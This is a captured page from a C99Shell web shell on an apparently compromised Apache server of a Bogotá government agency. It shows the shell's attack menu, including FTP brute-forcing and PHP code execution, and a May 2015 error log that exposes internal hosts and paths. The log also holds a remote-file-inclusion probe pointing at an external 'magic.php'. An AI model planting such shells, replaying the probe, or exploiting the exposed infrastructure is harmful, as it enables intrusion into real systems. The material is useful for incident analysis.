!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2015.05.12.log (191.37 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Tue May 12 00:29:34.188289 2015] [mpm_winnt:warn] [pid 7296:tid 2800] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue May 12 01:39:03.578413 2015] [mpm_winnt:warn] [pid 7296:tid 2800] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue May 12 02:08:22.855903 2015] [mpm_winnt:warn] [pid 7296:tid 2800] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue May 12 02:27:45.900345 2015] [mpm_winnt:warn] [pid 7296:tid 2800] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue May 12 03:00:26.465989 2015] [proxy_http:error] [pid 7296:tid 1060] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.184.197.76:59246] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue May 12 03:00:26.465989 2015] [proxy:error] [pid 7296:tid 1060] [client 201.184.197.76:59246] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue May 12 03:12:20.869244 2015] [proxy_http:error] [pid 7296:tid 1748] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.184.197.76:59311] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 03:12:20.869244 2015] [proxy:error] [pid 7296:tid 1748] [client 201.184.197.76:59311] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 03:17:27.596983 2015] [proxy_http:error] [pid 7296:tid 704] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.184.197.76:59327] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 03:17:27.596983 2015] [proxy:error] [pid 7296:tid 704] [client 201.184.197.76:59327] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 03:17:43.306210 2015] [proxy_http:error] [pid 7296:tid 1052] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.184.197.76:59330] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue May 12 03:17:43.306210 2015] [proxy:error] [pid 7296:tid 1052] [client 201.184.197.76:59330] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue May 12 04:01:13.581795 2015] [mpm_winnt:warn] [pid 7296:tid 2800] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue May 12 06:06:47.757428 2015] [:error] [pid 7296:tid 1052] [client 192.187.110.98:37590] script 'E:/nuevo/htdocs/testproxy.php' not found or unable to stat
[Tue May 12 07:26:18.934208 2015] [proxy_http:error] [pid 7296:tid 696] (20014)Internal error: [client 201.245.192.253:50639] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 07:26:18.934208 2015] [proxy:error] [pid 7296:tid 696] [client 201.245.192.253:50639] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/js/xml_utilities.js
[Tue May 12 07:45:18.656610 2015] [core:error] [pid 7296:tid 1524] (20024)The given path is misformatted or contained invalid characters: [client 84.33.37.182:34486] AH00127: Cannot map GET /galeria/nivo-slider/themes/%22dandelion?src=http%3A%2F%2Fwordpress.com.longlifeweld.com.my%2Fmagic.php HTTP/1.1 to file
[Tue May 12 07:45:19.655012 2015] [core:error] [pid 7296:tid 736] (20024)The given path is misformatted or contained invalid characters: [client 84.33.37.182:34487] AH00127: Cannot map GET /%22dandelion?src=http%3A%2F%2Fwordpress.com.longlifeweld.com.my%2Fmagic.php HTTP/1.1 to file
[Tue May 12 08:17:21.750988 2015] [proxy_http:error] [pid 7296:tid 1692] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57535] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue May 12 08:17:21.750988 2015] [proxy:error] [pid 7296:tid 1692] [client 201.245.192.253:57535] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Tue May 12 08:17:38.021817 2015] [proxy_http:error] [pid 7296:tid 1692] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:57789] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 08:17:38.021817 2015] [proxy:error] [pid 7296:tid 1692] [client 201.245.192.253:57789] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Magazin.asp&Sigla=MAC&IdModulo=2
[Tue May 12 08:32:36.068594 2015] [proxy:error] [pid 7296:tid 968] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.36:8080 (172.22.1.36) failed
[Tue May 12 08:32:36.068594 2015] [proxy:error] [pid 7296:tid 968] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.36) for 60s
[Tue May 12 08:32:36.068594 2015] [proxy_http:error] [pid 7296:tid 968] [client 201.245.192.253:56091] AH01114: HTTP: failed to make connection to backend: 172.22.1.36
[Tue May 12 08:34:35.424404 2015] [proxy_http:error] [pid 7296:tid 1356] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:58015] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 08:34:35.424404 2015] [proxy:error] [pid 7296:tid 1356] [client 201.245.192.253:58015] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp
[Tue May 12 08:37:54.309153 2015] [proxy_http:error] [pid 7296:tid 1356] (20014)Internal error: [client 201.245.192.253:48655] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 08:37:54.309153 2015] [proxy:error] [pid 7296:tid 1356] [client 201.245.192.253:48655] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/disk.png
[Tue May 12 08:41:05.643489 2015] [proxy_http:error] [pid 7296:tid 1652] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:51580] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue May 12 08:41:05.643489 2015] [proxy:error] [pid 7296:tid 1652] [client 201.245.192.253:51580] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue May 12 08:49:15.406349 2015] [proxy_http:error] [pid 7296:tid 1116] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.244.55.205:21954] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue May 12 09:04:12.674125 2015] [proxy_http:error] [pid 7296:tid 1140] (20014)Internal error: [client 186.155.62.50:21158] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/index2.jsp?a=0.9500335232506691
[Tue May 12 09:05:51.219498 2015] [core:error] [pid 7296:tid 1716] (22)Invalid argument: [client 191.152.30.210:42248] AH00127: Cannot map GET /SIG/Educaci\xf3n%20Ambiental/126PM05-PR11.pdf HTTP/1.1 to file
[Tue May 12 09:07:27.752468 2015] [core:error] [pid 7296:tid 1748] (20024)The given path is misformatted or contained invalid characters: [client 37.187.157.108:32768] AH00127: Cannot map HEAD /BLA/resoluciones/AUTOS%202009/0731.pdfhttp://190.27.245.106/BLA/resoluciones/RESOLUCIONES%202009/0759.pdf HTTP/1.1 to file
[Tue May 12 09:13:48.283936 2015] [proxy_http:error] [pid 7296:tid 704] (20014)Internal error: [client 181.50.92.73:56630] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?group_system_actual=3&codTraEsc=18125247&_a=0.3361642935043315
[Tue May 12 09:22:59.573304 2015] [proxy_http:error] [pid 7296:tid 1716] (20014)Internal error: [client 181.50.92.73:56740] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?group_system_actual=3&a=0.10959321493282914
[Tue May 12 09:24:19.601445 2015] [negotiation:error] [pid 7296:tid 1784] [client 201.245.192.253:55395] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://190.27.245.106/sia/
[Tue May 12 09:24:19.601445 2015] [negotiation:error] [pid 7296:tid 1428] [client 201.245.192.253:55398] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://190.27.245.106/sia/
[Tue May 12 09:24:19.601445 2015] [negotiation:error] [pid 7296:tid 1228] [client 201.245.192.253:55397] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://190.27.245.106/sia/
[Tue May 12 09:24:19.601445 2015] [negotiation:error] [pid 7296:tid 1548] [client 201.245.192.253:55396] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://190.27.245.106/sia/
[Tue May 12 09:37:13.830805 2015] [proxy_http:error] [pid 7296:tid 752] (20014)Internal error: [client 201.245.192.253:58702] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/suactividades.do?group_system_actual=3
[Tue May 12 09:37:13.830805 2015] [proxy:error] [pid 7296:tid 752] [client 201.245.192.253:58702] AH00898: Error reading from remote server returned by /forest/session.jsp, referer: http://190.27.245.106/forest/suactividades.do?group_system_actual=3
[Tue May 12 09:37:13.830805 2015] [negotiation:error] [pid 7296:tid 752] [client 201.245.192.253:58702] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_BAD_GATEWAY.html.var, referer: http://190.27.245.106/forest/suactividades.do?group_system_actual=3
[Tue May 12 09:41:06.708014 2015] [proxy_http:error] [pid 7296:tid 1228] (20014)Internal error: [client 201.245.192.253:50385] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.4384109534415932&group_system_actual=3
[Tue May 12 09:41:06.801614 2015] [proxy_http:error] [pid 7296:tid 1228] (20014)Internal error: [client 201.245.192.253:50387] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.4384109534415932&group_system_actual=3
[Tue May 12 09:41:06.801614 2015] [proxy:error] [pid 7296:tid 1228] [client 201.245.192.253:50387] AH00898: Error reading from remote server returned by /ForestMSG_SDA/channelAsync/template_word_18068078, referer: http://190.27.245.106/forest/usutareas.do?_a=0.4384109534415932&group_system_actual=3
[Tue May 12 09:41:48.796888 2015] [proxy_http:error] [pid 7296:tid 948] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:58010] AH01095: prefetch request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue May 12 09:43:17.545444 2015] [proxy_http:error] [pid 7296:tid 1784] (20014)Internal error: [client 201.245.192.253:52799] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.4384109534415932&group_system_actual=3
[Tue May 12 09:44:16.466747 2015] [proxy_http:error] [pid 7296:tid 1784] (20014)Internal error: [client 201.245.192.253:53939] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:44:16.466747 2015] [proxy:error] [pid 7296:tid 1784] [client 201.245.192.253:53939] AH00898: Error reading from remote server returned by /forest/1ibre/jscalendar/calendar-win2k-1.css
[Tue May 12 09:46:52.623021 2015] [proxy_http:error] [pid 7296:tid 824] (20014)Internal error: [client 201.245.192.253:56846] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:46:52.623021 2015] [proxy:error] [pid 7296:tid 824] [client 201.245.192.253:56846] AH00898: Error reading from remote server returned by /forest/img/ayuda.gif
[Tue May 12 09:46:57.973831 2015] [proxy_http:error] [pid 7296:tid 1532] (20014)Internal error: [client 201.245.192.253:56959] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:46:57.973831 2015] [proxy:error] [pid 7296:tid 1532] [client 201.245.192.253:56959] AH00898: Error reading from remote server returned by /forest/img/asociarUser.gif
[Tue May 12 09:46:58.005031 2015] [proxy_http:error] [pid 7296:tid 704] (20014)Internal error: [client 201.245.192.253:56968] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:46:58.005031 2015] [proxy:error] [pid 7296:tid 704] [client 201.245.192.253:56968] AH00898: Error reading from remote server returned by /forest/js/jquery/jquery.atmosphere.js
[Tue May 12 09:54:19.611607 2015] [proxy_http:error] [pid 7296:tid 1124] (20014)Internal error: [client 201.245.192.253:53794] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:54:19.611607 2015] [proxy:error] [pid 7296:tid 1124] [client 201.245.192.253:53794] AH00898: Error reading from remote server returned by /forest/img/users/5.gif
[Tue May 12 09:54:19.627207 2015] [proxy_http:error] [pid 7296:tid 1500] (20014)Internal error: [client 201.245.192.253:53801] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 09:54:19.627207 2015] [proxy:error] [pid 7296:tid 1500] [client 201.245.192.253:53801] AH00898: Error reading from remote server returned by /forest/img/pantalla.gif
[Tue May 12 09:59:34.373359 2015] [proxy_http:error] [pid 7296:tid 704] (20014)Internal error: [client 201.245.192.253:59195] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.218698865539801&group_system_actual=3
[Tue May 12 09:59:53.639393 2015] [proxy_http:error] [pid 7296:tid 1180] (20014)Internal error: [client 201.245.192.253:59738] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/buscar.do?type=procesos
[Tue May 12 10:02:06.489227 2015] [proxy_http:error] [pid 7296:tid 1460] (20014)Internal error: [client 201.245.192.253:50881] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/usutareas.do?_a=0.5709177423592449&group_system_actual=3
[Tue May 12 10:02:07.160028 2015] [proxy_http:error] [pid 7296:tid 1716] (20014)Internal error: [client 201.245.192.253:51058] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:02:07.160028 2015] [proxy:error] [pid 7296:tid 1716] [client 201.245.192.253:51058] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/js/number-functions.js
[Tue May 12 10:02:07.175628 2015] [proxy_http:error] [pid 7296:tid 1260] (20014)Internal error: [client 201.245.192.253:51063] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:02:07.175628 2015] [proxy:error] [pid 7296:tid 1260] [client 201.245.192.253:51063] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/css/menu.css
[Tue May 12 10:03:05.051730 2015] [proxy_http:error] [pid 7296:tid 1180] (20014)Internal error: [client 201.245.192.253:52965] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:03:05.051730 2015] [proxy:error] [pid 7296:tid 1180] [client 201.245.192.253:52965] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/icons/doc.gif
[Tue May 12 10:03:05.067330 2015] [proxy_http:error] [pid 7296:tid 1460] (20014)Internal error: [client 201.245.192.253:52968] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:03:05.067330 2015] [proxy:error] [pid 7296:tid 1460] [client 201.245.192.253:52968] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/mueveactividad.gif
[Tue May 12 10:03:21.228958 2015] [proxy_http:error] [pid 7296:tid 992] (20014)Internal error: [client 201.245.192.253:53235] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:03:21.228958 2015] [proxy:error] [pid 7296:tid 992] [client 201.245.192.253:53235] AH00898: Error reading from remote server returned by /forest/img/buscar.jpg
[Tue May 12 10:03:21.244558 2015] [proxy_http:error] [pid 7296:tid 992] (20014)Internal error: [client 201.245.192.253:53240] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:03:21.244558 2015] [proxy:error] [pid 7296:tid 992] [client 201.245.192.253:53240] AH00898: Error reading from remote server returned by /forest/img/instanciar.gif
[Tue May 12 10:03:21.260158 2015] [proxy_http:error] [pid 7296:tid 1628] (20014)Internal error: [client 201.245.192.253:53251] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:03:21.260158 2015] [proxy:error] [pid 7296:tid 1628] [client 201.245.192.253:53251] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/img/cancel.gif
[Tue May 12 10:09:22.307192 2015] [proxy_http:error] [pid 7296:tid 1716] (20014)Internal error: [client 201.245.192.253:59202] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:09:22.307192 2015] [proxy:error] [pid 7296:tid 1716] [client 201.245.192.253:59202] AH00898: Error reading from remote server returned by /forest/js/escritorio/escritorio.js
[Tue May 12 10:09:22.619193 2015] [proxy_http:error] [pid 7296:tid 1228] (20014)Internal error: [client 201.245.192.253:59225] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:09:22.619193 2015] [proxy:error] [pid 7296:tid 1228] [client 201.245.192.253:59225] AH00898: Error reading from remote server returned by /forest/1ibre/images/minus.gif
[Tue May 12 10:12:40.833141 2015] [proxy:error] [pid 7296:tid 1852] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:48363] AH01084: pass request body failed to 172.22.1.31:80 (172.22.1.31), referer: http://190.27.245.106/isolucionsda//Administracion/Upload/Upload.asp?Id_Articulo=8356&UPLDQuerystring=Id_Articulo=8356&UPLDMODO=SubirArchivoADocumento&UPLDRuta=C:\\ISOlucion\\Web\\BancoConocimiento\\A\\Anexo5SolicituddeAprobacionSolicituddeaprobaciondelplandecontingenciaparaactividadesy_v1\\&UPLDAtras=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue May 12 10:12:40.833141 2015] [proxy_http:error] [pid 7296:tid 1852] [client 201.245.192.253:48363] AH01097: pass request body failed to 172.22.1.31:80 (172.22.1.31) from 201.245.192.253 (), referer: http://190.27.245.106/isolucionsda//Administracion/Upload/Upload.asp?Id_Articulo=8356&UPLDQuerystring=Id_Articulo=8356&UPLDMODO=SubirArchivoADocumento&UPLDRuta=C:\\ISOlucion\\Web\\BancoConocimiento\\A\\Anexo5SolicituddeAprobacionSolicituddeaprobaciondelplandecontingenciaparaactividadesy_v1\\&UPLDAtras=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue May 12 10:13:34.575235 2015] [proxy_http:error] [pid 7296:tid 1500] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:58089] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda//Administracion/Upload/Upload.asp?Id_Articulo=8356&UPLDQuerystring=Id_Articulo=8356&UPLDMODO=SubirArchivoADocumento&UPLDRuta=C:\\ISOlucion\\Web\\BancoConocimiento\\A\\Anexo5SolicituddeAprobacionSolicituddeaprobaciondelplandecontingenciaparaactividadesy_v1\\&UPLDAtras=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue May 12 10:13:34.575235 2015] [proxy:error] [pid 7296:tid 1500] [client 201.245.192.253:58089] AH00898: Error reading from remote server returned by /isolucionsda//Administracion/Upload/UploadArchivo.asp, referer: http://190.27.245.106/isolucionsda//Administracion/Upload/Upload.asp?Id_Articulo=8356&UPLDQuerystring=Id_Articulo=8356&UPLDMODO=SubirArchivoADocumento&UPLDRuta=C:\\ISOlucion\\Web\\BancoConocimiento\\A\\Anexo5SolicituddeAprobacionSolicituddeaprobaciondelplandecontingenciaparaactividadesy_v1\\&UPLDAtras=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp&UPLDAdelante=http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue May 12 10:14:01.438482 2015] [proxy_http:error] [pid 7296:tid 1724] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:58839] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:14:01.438482 2015] [proxy:error] [pid 7296:tid 1724] [client 201.245.192.253:58839] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:14:26.429726 2015] [proxy_http:error] [pid 7296:tid 828] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:59243] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:14:26.429726 2015] [proxy:error] [pid 7296:tid 828] [client 201.245.192.253:59243] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:16:33.367149 2015] [proxy_http:error] [pid 7296:tid 1716] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:50102] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:16:33.367149 2015] [proxy:error] [pid 7296:tid 1716] [client 201.245.192.253:50102] AH00898: Error reading from remote server returned by /isolucionsda/Logout.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:16:38.203158 2015] [proxy_http:error] [pid 7296:tid 736] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:50190] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:16:38.203158 2015] [proxy:error] [pid 7296:tid 736] [client 201.245.192.253:50190] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:17:01.384798 2015] [proxy_http:error] [pid 7296:tid 1244] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:50974] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:17:01.384798 2015] [proxy:error] [pid 7296:tid 1244] [client 201.245.192.253:50974] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:17:12.710418 2015] [proxy_http:error] [pid 7296:tid 968] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:51256] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:17:12.710418 2015] [proxy:error] [pid 7296:tid 968] [client 201.245.192.253:51256] AH00898: Error reading from remote server returned by /isolucionsda/FramesetArticulo.asp
[Tue May 12 10:17:26.391642 2015] [proxy_http:error] [pid 7296:tid 1484] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:51569] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:17:26.391642 2015] [proxy:error] [pid 7296:tid 1484] [client 201.245.192.253:51569] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:19:33.344665 2015] [proxy_http:error] [pid 7296:tid 1180] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:54340] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:19:33.344665 2015] [proxy:error] [pid 7296:tid 1180] [client 201.245.192.253:54340] AH00898: Error reading from remote server returned by /isolucionsda/Logout.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Administracion/SalaEdicion/Magazines.asp
[Tue May 12 10:19:38.180674 2015] [proxy_http:error] [pid 7296:tid 1852] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:54444] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:19:38.180674 2015] [proxy:error] [pid 7296:tid 1852] [client 201.245.192.253:54444] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:20:12.687934 2015] [proxy_http:error] [pid 7296:tid 1472] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:54884] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:20:12.687934 2015] [proxy:error] [pid 7296:tid 1472] [client 201.245.192.253:54884] AH00898: Error reading from remote server returned by /isolucionsda/FramesetArticulo.asp
[Tue May 12 10:24:23.754775 2015] [proxy_http:error] [pid 7296:tid 968] (20014)Internal error: [client 201.245.192.253:53948] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:24:23.754775 2015] [proxy:error] [pid 7296:tid 968] [client 201.245.192.253:53948] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/css/forms.css
[Tue May 12 10:24:23.770375 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 201.245.192.253:53955] AH01102: error reading status line from remote server 172.22.1.47:80
[Tue May 12 10:24:23.770375 2015] [proxy:error] [pid 7296:tid 1780] [client 201.245.192.253:53955] AH00898: Error reading from remote server returned by /forest/skins/gdocs-jar/js/formsBase.js
[Tue May 12 10:24:36.390798 2015] [proxy_http:error] [pid 7296:tid 1780] (20014)Internal error: [client 172.22.2.1:54461] AH01102: error reading status line from remote server 172.22.1.47:80, referer: http://190.27.245.106/forest/login.do
[Tue May 12 10:28:22.123194 2015] [proxy_http:error] [pid 7296:tid 1724] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:51035] AH01102: error reading status line from remote server 172.22.1.31:80
[Tue May 12 10:28:22.123194 2015] [proxy:error] [pid 7296:tid 1724] [client 201.245.192.253:51035] AH00898: Error reading from remote server returned by /isolucionsda/ControlDeInicio.asp
[Tue May 12 10:31:22.100710 2015] [proxy_http:error] [pid 7296:tid 1060] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : [client 201.245.192.253:55920] AH01102: error reading status line from remote server 172.22.1.31:80
